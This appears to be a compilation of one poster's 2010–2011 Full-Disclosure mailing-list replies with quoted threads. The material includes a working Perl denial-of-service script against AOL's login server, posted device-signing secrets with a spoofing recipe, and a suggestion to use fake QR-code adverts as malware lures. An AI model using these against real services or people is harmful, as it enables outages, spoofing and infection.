Re: [Full-disclosure] Using QR tags to Attack SmartPhones (Attaging)

[T Biehn]

I like the idea of advertising a 'free * for your phone' around interesting
targets, perhaps posting fake adverts in the DC subway system? I think
people will trust print more than web and jump at the opportunity to scan
and install anything.

-Travis


On Sun, Sep 11, 2011 at 12:04 AM, Augusto Pereyra wrote:

> I'd like to share this paper with all.
>
> English version
>
> http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones_10.html
>
> Version en español
>
> http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones.html
>
> Thanks to all
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/




-- 
Twitter  |
LinkedIn|
TravisBiehn.com 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

full-disclosure@lists.grok.org.uk

[T Biehn]

There were some trojans back in the day that would imitate normal browsing
(proxying cnn.com for instance) and it'd stuff a encrypted command packets
in there.
Combine that with a load balancing check-back time in the response, you can
probably support a very large number of bots on a single webserver.

-Travis

On Sat, Sep 17, 2011 at 8:10 PM, Corey Nachreiner <
corey.nachrei...@watchguard.com> wrote:

> This basic video series may help:
>
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-one.asp
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-two.asp
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-three.asp
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnet-source-code-for-overachievers.asp
>
> That said, we made that ages ago. It is quite dated. Most modern botnets
> have started to use HTTP C&C channels, often encrypted. They also sometimes
> obfuscate their C&C via proxies and p2p. Leaked source code for Zues and
> spyeye probably would provide a better idea of how modern botnets work.
>
> Cheers,
>
> Corey Nachreiner, CISSP | Senior Network Security Strategist
> WatchGuard Technologies, Inc. | www.watchguard.com
>
> 206.613-0873 Direct
> 206.227.6905 Mobile
> corey.nachrei...@watchguard.com
>
> Office Hours: 9:15 AM to 6:15 PM Pacific (GMT-8), Mon - Fri
>
> Better be despised for too anxious apprehensions, than ruined by too
> confident security. - Edmund Burke
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> WatchGuard: Stronger Security, Simply Done
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM
> Sent: Friday, September 16, 2011 8:38 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] understanding the botnet C&C..
>
> hi
> an area that I am basically "stupid" on is botnets. Not what they are
> but "how" they work through IRC as the control center. Not just that
> but the various modern programs used. I am aware for instance LOIC can
> be used to connect to an IRC channel.. but, how then does the "herder"
> do the job from IRC..how does he issue commands that all the computers
> connected act upon, etc. ? My curiosity has just got the best of me
> and I would like some pointers to good material that can feed it.
>
> Sorry for the "troll" like post but I really would like to understand
> this further. Have done a number of Google searching but have hope
> someone here has done personal research.
>
> --
> been great, thanks
> RandyM
> a.k.a System
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available

[T Biehn]

Maybe he should build a vulnerability into each version, so he can announce
each new version with the disclosure and satisfy your constraints.

-Travis

On Wed, Aug 10, 2011 at 10:44 AM, Steven Pinkham wrote:

> valdis.kletni...@vt.edu wrote:
> > On Tue, 02 Aug 2011 22:17:58 -0300, root said:
> >> Dude you just released INSECT Pro 2.7 less than a week ago. I swear to
> >> god I'm being serious.
> >
> > It's not unusual for commercial products with customers that demand
> product
> > stability to release version 3.5 or whatever, then release 3.6, and after
> that
> > release 3.5.1, 3.5.2, yadda yadda with just bugfixes so sites can get
> patched
> > without having to make the 3.5->3.6 jump.
>
> Yes.  But they don't spam full-disclosure with that info every week.
> Rapid releases can be good, but the list charter says:
>
> "Gratuitous advertisement, product placement, or self-promotion is
> forbidden."
>
> Announcing every point release of a commercial product falls afoul of
> that.
> --
>  | Steven Pinkham, Security Consultant|
>  | http://www.mavensecurity.com   |
>  | GPG public key ID CD31CAFB |
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] new anon tool

[T Biehn]

nothing.

On Wed, Aug 3, 2011 at 5:08 PM, RandallM  wrote:

> have you heard much about the #RefRef  tool? What so unique and hasnt
> been done or triedd before?
>
> --
> been great, thanks
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (fractal-Self__) : A theoretical introduction to Universe, Conscious Machines and Programming Ur-cells !!!

[T Biehn]

tl;dr
ACID IS A LOT OF FUN AMIRITE?

-TRAVIS

On Sun, Jun 12, 2011 at 8:36 PM, Christian Sciberras wrote:

> Fractal fractal fractal, even us that coined the concept can't keep it
> going forever.
> Seems evident that each subsystem looses key aspects of its parent, this
> might turn out to be a system flaw, or a constrained space.
> We might have discovered this flaw already and we might have been using all
> this time since nothing tells us the laws of our universe are true to its
> container (if at all).
>
> Chris.
>
>
>
> On Sun, Jun 12, 2011 at 10:13 PM, Michal Zalewski wrote:
>
>> > Paradox are way of life... Hence, the goal here is to question every
>> > knowledge with reasoning and trying-not to build a static opinion on
>> > anything.
>>
>> But have you tried contacting the vendor first?
>>
>> /mz
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] LulzSec EXPOSED!

[T Biehn]

Will you be presenting at BlackHat?

-Travis

On Mon, Jun 6, 2011 at 9:57 AM, Benji  wrote:

> (picture found by looking through dir)
>
>
> On Mon, Jun 6, 2011 at 2:54 PM, Andreas Bogk  wrote:
>
>> Excerpts from Benji's message of Mo Jun 06 15:32:11 +0200 2011:
>> > http://89.248.164.63/dox/xyz/20.png
>>
>> Ah, that's a much saner explanation. :)
>>
>> Andreas
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] LulzSec EXPOSED!

[T Biehn]

LOL @
"A timing attack on ssh passwords over the net?"

and

"I think its just a bruteforce."

-Travis

On Mon, Jun 6, 2011 at 7:58 AM, Gichuki John Chuksjonia <
chuksjo...@gmail.com> wrote:

> I think its just a bruteforce.
>
>
>
>
> On 6/6/11, Andreas Bogk  wrote:
> > Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
> >> Lulzsec == pwnt
> >
> > I've seen the log you pasted to pastebin.  Is this:
> >
> >  * A timing attack on ssh passwords over the net?
> >  * Fake, to distract us from your real 0day?
> >
> > Andreas
> >
> > Log:
> >
> > root@gibson:~# ./1337hax0r 204.188.219.88 -root
> > Attempting too hax0r root password on 204.188.219.88
> >
> > h,VhXz > 3xL > ffsakTgyc~H
> > ZZrz,pJrg > b{4Bv_Y$$Z6
> > XDh;vDU-;3>
> > FB-hvg%g_'t
> > }qHNvkS"'>g
> > RNBKvUi5yO|
> > z`(}v<1^>u&
> > *V4?vh9#^f2
> > /R*9vf > 9P65vjKhh.N
> > \rfsv~PhNDz
> >>Bfpv|uhGpy
> > J%"kvf]hGf0
> > sY0"v{2hf7p
> >>9dev%Qh6_v
> > * > }:lkvV^hN2U
> > ;&5Xv'Sh#}_
> > MOqpvi_hg+#
> > Md9/viVh&u7
> > M(%rvomhb'"
> > MI"5v_shEVe
> > M=@?vl.hZge
> > MPk5v:WhUTe
> > M=3vvrzh7Te
> > M&'?v]sh`Te
> > M/Z,vI1h`Te
> > M.9>vO$hTTe
> > Ms!(vY;hpTe
> > MA)SvYLhnTe
> > M7eCv@Lh0Te
> > MkeCvFLh$Te
> > M'eCv?LhaTe
> > M&eCvLLh|Te
> > M*eCv5Lh\Te
> > MmeCvcLhCTe
> > MTeCv&LhrTe
> > M,eCv1LhYTe
> > MEeCv}LhHTe
> > M_eCvSLhnTe
> > MPeCvSLh+Te
> > M[eCvSLh,Te
> > MOeCvSLh"Te
> > M7eCvSLh"Te
> > MGeCvSLhdTe
> > M$eCvSLhkTe
> > MCeCvSLhkTe
> > MLeCvSLhkTe
> > M=eCvSLhkTe
> > M-eCvSLhkTe
> > MweCvSLhkTe
> > M=eCvSLhkTe
> > M3eCvSLhkTe
> > M6eCvSLhkTe
> > MreCvSLhkTe
> > M6eCvSLhkTe
> > MFeCvSLhkTe
> > MSeCvSLhkTe
> > M8eCvSLhkTe
> >
> > Password hax0rd! root password: M8eCvSLhkTe
> >
> > root@gibson:~# ssh 204.188.219.88
> >
> > root@204.188.219.88's password:
> >
> > root@xyz:~# hostname; id; w
> > xyz
> > uid=0(root) gid=0(root) groups=0(root)
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> --
> --
> Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
> I.T Security Analyst and Penetration Tester
> jgichuki at inbox d0t com
>
> {FORUM}http://lists.my.co.ke/pipermail/security/
> http://chuksjonia.blogspot.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Some magic secrets.

[T Biehn]

Yeah these are Yahoo TV Widget url signing keys for Samsung & LG devices,
they are used together with a timestamp to prevent you from grabbing other
people's widgets/spoofing devices. If you fire up wireshark while you're
poking at these TV's you'll see some calls to Yahoo services ending in
&sign=

url = http://yahoo?1=a&2=b&3=c
url = url+"&sign="md5(url+Secret)

Update the ts (timestamp in msecs) parameter, resign, post & play.
Interesting to look at the various widgets & sources, none of them have any
form of obfuscation applied to the javascript, could be useful in finding
and exploring unknown APIs :)

-Travis

On Thu, Mar 10, 2011 at 3:18 PM, Ryan Sears  wrote:

> Hrm
>
> Could this have something to do with this => http://pastebin.com/rD8hwpxT? :-P
>
> As far as 'magic secrets' go, either disclose something or don't. Then move
> on, personally I think posting cryptic messages to a public forum like this
> is a bit dumb. If you're trying to say something, just say it.
>
> Ryan
>
> - Original Message -
> From: "T Biehn" 
> To: "full-disclosure" 
> Sent: Thursday, March 10, 2011 1:22:50 PM GMT -05:00 US/Canada Eastern
> Subject: [Full-disclosure] Some magic secrets.
>
> SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY-
> L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU-
> SO:?
> V:?
>
> Do the replace live: localhost
>
>
> Also,
> First!
>
> -Travis
> --
> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] psnhack - playstation network hack

[T Biehn]

I'm pretty sure the ps3dev crowd aren't responsible for any sort of breach
of Sony's servers. But, I guess, if you didn't understand what they were
talking about you'd see 'hack' and 'psn'.

-Travis

2011/5/1 アドリアンヘンドリック 

> Dear operators of Full disclosure,
>
> Please do not make the below message to be up in the maillist.
> The link which contains translation text is currently being used by
> what so called anonymous and they put it in their site.
> I am really angry and frustrated for it, and erasing the text file in
> my server now.
> Sorry for the inconvenience.
>
> On Sun, May 1, 2011 at 9:22 PM, ZeroDay.JP 
> wrote:
> > Just having some additional info to share regardingly. Sorry for
> interrupt.
> >
> > In Japan people were very patient to wait for announce from Sony, while
> in
> > heart worried so much.
> > It was 27th just a day before summer holiday here when the announce came
> ..
> > I got to hold the phone for 3hours to passed thru to cancell all cards.
> >
> > Today I was watching the whole Sony news conference and writing it in
> text
> > word by word the took time to translate to english. The reporters here
> was
> > presenting the user's feelings very well, and I really respect them a
> lot,
> > they cleverly cornered Mr. Hirai's team with very logical questions.
> > Access for the Q&A text is here... http://0day.jp/data/PSN.txt
> >
> > I hope this list allowed this message to pass through, for I got a strong
> > sense that maybe I cannot hold the the text uptime for too long.
> >
> > Best regards,
> > ---
> > Hendrik ADRIAN
> > ZeroDay Japan http://0day.jp
> > Twit: @unixfreaxjp, blog: "ZeroDay.JP" http://unixfreaxjp.blogspot.com
> >
> >
> >
> >
> > Sent to you by ZeroDay.JP via Google Reader:
> >
> >
> >
> >
> > Re: psnhack - playstation network hack
> >
> > via Full Disclosure on 5/1/11
> >
> > Posted by Peter Osterberg on May 01
> >
> > In Sweden they did that 14 days after they got hacked, and at the same
> > time informed us that we should pay attention to weird things happening
> > on our bank accounts...
> >
> > LOL, it's fucking lame to come out with that warning 14 days after
> it
> > happened... Quite obvious that they wanted to bury the whole thing...
> >
> > Thor (Hammer of God) skrev 2011-04-30 19:13:
> >
> >
> >
> >
> > Things you can do from here:
> >
> > Subscribe to Full Disclosure using Google Reader
> > Get started using Google Reader to easily keep up with all your favorite
> > sites
> >
> >
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] password.incleartext.com

[T Biehn]

I sent this only to Romain,
Some other posters wanted to know the other scenarios.

-Travis

-- Forwarded message --
From: T Biehn 
Date: Wed, Apr 6, 2011 at 10:33 AM
Subject: Re: [Full-disclosure] password.incleartext.com
To: Romain Bourdy 


The only scheme where there's a semblance of security is if the decryption
key was stored in memory only. (Provided on startup perhaps?)

Or the server stores a one way hash of the password for verification, then
the encrypted version, and queues them up on the X for decryption, an admin
grabs the packet and decrypts locally.

Neither of those schemes are likely to have been implemented on any site,
ever.

In which case plain-text is equivalent to encrypted text with an easily
recoverable key.

-Travis


On Wed, Apr 6, 2011 at 10:01 AM, Romain Bourdy  wrote:

> Hi Full-Disclosure,
>
> Just my two cents but ... the fact they can give your password back doesn't
> mean it's stored in cleartext, just that it's not hashed but encrypted with
> some way to get the original data back, this doesn't mean at all it's not
> secured, even though in most case it's not.
>
>  -Romain
>
>
> On Wed, Apr 6, 2011 at 1:36 PM,  wrote:
>
>> Kinda plaintextoffenders.com?
>>
>> wbr,
>>  - Max
>>
>> full-disclosure-boun...@lists.grok.org.uk wrote on 01.04.2011 02:17:24:
>>
>> > Inc leartext 
>> > Sent by: full-disclosure-boun...@lists.grok.org.uk
>> >
>> > 01.04.2011 13:14
>> >
>> > To
>> >
>> > full-disclosure@lists.grok.org.uk
>> >
>> > cc
>> >
>> > Subject
>> >
>> > [Full-disclosure] password.incleartext.com
>> >
>> > Hi FD,
>> >
>> > Just launched a new website to keep a list of websites storing
>> > passwords in clear text, so far the database is small but feel free
>> > to add some:
>> > http://password.incleartext.com/
>>
>> >
>> > Cheers,
>> > Inc Leartext___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Some magic secrets.

[T Biehn]

SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY-
L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU-
SO:?
V:?

Do the replace live: localhost


Also,
First!

-Travis
-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Anyone on list have a Samsung TV w/ Yahoo TV Widgets?

[T Biehn]

Working on something, I'm wondering about a few settings on Sammy's vs LG
tvs for YTV.

Shoot me an e-mail if you're interested!

-Travis

-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DOS AOL AIM via perl

[T Biehn]

You need at minimum 2x the number of IPs your target has to take it down.
Via proxies, bots, whatever.

Targets can implement per IP throttling/blacklisting. Which means you need
more than IPs than that.

IIRC Aol throttles connection attempts.

-Travis

On Tue, Dec 14, 2010 at 10:13 AM, Cyber Flash wrote:

>   Create many ESTABLISHED connections (60,000) to login.oscar.aol.comserver
> and then temporarily disable the local client gateway, close the sockets
> (the RST packets aren’t sent to AOL), reopen the gateway and repeat this
> process.
>
>  Anyone have ideas on the pros/cons of using this technique?
>
> # Client -> Server [SYN]
> # Server -> Client [SYN, ACK]
> # Client -> Server [ACK]
> # Server -> Client 10 bytes (conn_ack)
> # Client -> Server 10 bytes (conn_ack)
> # Server -> Client [ACK]
>
> use IO::Socket;
> use Thread;
> use Win32::OLE qw(in);
>
> # --- SCRIPT CONFIGURATION ---
> my $host="login.oscar.aol.com";
> my $port=80;
>
> # --- END CONFIGURATION ---
> my $ip="";
> my $gateway="";
> my $fake_gateway="1.1.1.1";
> my $mask="";
> my $adpater="";
> my $alive=0;
>
>
> $object=Win32::OLE->GetObject('winmgmts:{impersonationLevel=impersonate}!//.');
> foreach my
> $nic(in$object->InstancesOf('Win32_NetworkAdapterConfiguration')){
>next unless $nic->{IPEnabled};
>$...@{$nic->{IPAddress}}[0];
>$gatew...@{$nic->{DefaultIPGateway}}[0];
>$ma...@{$nic->{IPSubnet}}[0];
>print "IPv4 Address: $ip\nDefault Gateway: $gateway\nSubnet Mask:
> $mask\n";
>last;
> }
>
> $objWMI = Win32::OLE->GetObject("winmgmts://./root/cimv2");
> $colNAs = $objWMI->InstancesOf('Win32_NetworkAdapter');
> foreach my $objNA (in $colNAs){
>next unless $objNA->{NetEnabled};
>$adapter=$objNA->NetConnectionID;
>print "Ethernet Adapter: $adapter\n";
>last;
> }
>
> while (1) {
>for ($n=0;$n<=3000;$n++){
>   $thr=new Thread\&connect;
>   $thr->detach;
>   $t++;
>   print "Connection: $t\n";
>   select(undef, undef, undef, 0.25);
>}
>print "\nDisabling Gateway...\n";
>system("netsh interface ip set address name=\"$adapter\" static $ip
> $mask $fake_gateway 1");
>$alive=1;
>sleep 3;
>print "\nEnabling Gateway\n";
>system("netsh interface ip set address name=\"$adapter\" static $ip
> $mask $gateway 1");
>$alive=0;
> }
>
> sub connect{
>   my $socket =
> IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>$port);
>   $socket->recv($data,10);
>   $socket->send($data);
>   while ($alive==0) {sleep 1;}
> }
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

[T Biehn]

a+ troll.

-Travis

On Sun, Oct 31, 2010 at 9:24 AM, Christian Sciberras wrote:

> Only thing, there's the danger of someone using stolen certificates.
> But I'm sure there's another fix for that.
>
> In my opinion, all in all, you're creating a yet another overly complex
> system with as yet more possible flaws.
> Don't forget tat each new line of code is a potential attack vector which
> affects any system.
>
> Just my 2 cents...
>
> Chris.
>
>
>
> On Sun, Oct 31, 2010 at 1:09 PM, Mario Vilas  wrote:
>
>> Just signing the update packages prevents this attack, so it's not that
>> hard to fix.
>>
>> On Sat, Oct 30, 2010 at 5:02 PM,  wrote:
>>
>>> On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said:
>>> > It's now a time for vendors to re-consider their updating scheme.
>>>
>>> And do what differently, exactly?
>>>
>>> OK, so it's *possible* to fake out the iTunes update process.  But which
>>> is easier
>>> and more productive:
>>>
>>> A) Laying in wait for some random to think "Wow, I should update iTunes"
>>> and
>>> hijack the process.
>>>
>>> B) Send out a few hundred thousand spam with a '
>>> From:upd...@apple-itunes-support.com
>>> '
>>> with a link to a site you control and feed the the sheep some malware.
>>>
>>> Evilgrade looks like a nice tool to have if you're doing a pen test or a
>>> targeted attack and can somehow get the victim to do an update (possibly
>>> social
>>> engineering), but for any software vendor feeding software updates to Joe
>>> Sixpack this threat model is *so* far down the list it isn't funny.
>>>  Simply
>>> compare the number of boxes pwned by (A) and (B) - how many people have
>>> gotten
>>> pwned because somebody hijacked their update from Symantec or wherever,
>>> compared to the number pwned because they got a popup that said "Your
>>> computer
>>> is infected, click here to fix it"?
>>>
>>> Remember - just because a new tool useful for an attacker shows up, does
>>> *not*
>>> mean it's a game changer for the industry at large.
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>> --
>> HONEY: I want to… put some powder on my nose.
>> GEORGE: Martha, won’t you show her where we keep the euphemism?
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DLL hijacking POC (failed, see for yourself)

[T Biehn]

Shit man, I was keeping notes for my class in pedantry, can't you two keep
it going for a few more days?

-Travis

On Wed, Sep 15, 2010 at 7:19 PM, Stefan Kanthak wrote:

> Christian Sciberras wrote:
>
> >> Yes. Once again: get your homework done!
> >>
> >>> http://www.codeproject.com/KB/DLL/dynamicdllloading.aspx
> >>
> >> That's a double DYNAMIC there!
> >
> > Did you even bother to read the article? The very first paragraph
> > states the difference between the two.
> >
> > Oh, and for the records, you can't statically link to dll files. At
> > least, not in the way you're imagining.
>
> You should start to read what I wrote in
> <34a088424c7d499f988d1adca645b...@localhost>:
>
> | Static linking occurs when the linker builds a binary (this might be a
> | DLL.-) using *.OBJ and *.LIB.
>
> > Static linking (in your case) only works for object files (.o or .lib).
>
> I wrote that already.
>
> >> Why should I bother to do the work of the loader?
> >> I reference the DLL export in my code and expect the loader to resolve
> >> it. There is no need for fancy do-it-yourself DLL entry resolution!
> >
> > Forfuckssake where did this point come from?
>
> Your completely superfluous trip to codeproject.com!
>
> >> Nobody can load a DLL that does not exist!
> >
> > Wow what genius! The hell with that. It's the practice that is wrong.
> > As the saying goes, one shouldn't cry over spilled milk;
> > attempting to load a non-existent is asking for trouble.
> >
> > Oh, and by the way. Looks like MS just broke your little fact...
> > ...they've been loading an nonexistent dll via ACROS' POC (via wab.exe).
>
> Bloody wrong: the .DLL accompanies the *.VCF in the share.
>
> >> Why should I call or even write a routine which checks whether a DLL
> >> exists instead of just calling the loader and let it search/load it?
> >> Hint #1: this is exactly what MSFT advices NOT to do!
> >
> > And they are right. You shouldn't be doing the OS's work.
> >
> >> Hint #2: loading a DLL does not mean to run any code from this DLL!
> >
> > But it is still loading the library into memory.
>
> That's what I expect when loading a DLL.
>
> > From there on, perhaps, some buffer overflow exploit would escalate the
> issue.
>
> Which issue? Ever heard of Occams Razor?!
>
> > At which point we all go critical over the damn crap just like you're
> > doing right now.
>
> Why? You wrote that your self-written POC failed!
> ACROS' POC but works. Who's wrong?
>
> >> Who guarantees that your self-written or the OS supplied search routine
> >> will find the same DLL as the loader (just in case you do not use the
> >> fully qualified pathname of the DLL)?
> >
> > Because that is the damn point of the function, to tell us what the
> > hell the loader is doing!!
>
> Which function then tells me what your function is doing?
> LoadLibrary*() IS documented, and its rather well documented.
> There's no need to reprogram it. Just use it. And check its return code!
>
> >> Why should someone with a sane mind let a program (or the OS) search
> >> a DLL twice? Just to waste performance?
> >
> > Why search? A simple CreateFile() (aka FileExists in winapi) over the
> > cached path would suffice.
>
> Which cached path? KISS!
> Remember: for DLL hijacking to work the input to LoadLibrary() needs to
> be a simple filename or a relative pathname.
>
> > Perhaps returning this cached path would completely solve the issue.
>
> Perhaps. The Win32 API but does not provide such a function!
>
> >> For DLLs: always. For EXEs: it depends. Just read it in the MSDN!
> >>
> >> Just in case that you misunderstood "from the very beginning" let me
> >> rephrase it: from the earliest days of DOS/Windows CWD was in the PATH.
> >
> > That is NOT true.
>
> OF COURSE THIS IS TRUE!
>
> > I don't know if it was, perhaps in the Win95 era,
> > but it most certainly is not there today.
>
> %PATH% is ALWAYS equivalent to .;%PATH%
>
> > That was what my POC proved. Did you read the full article? I
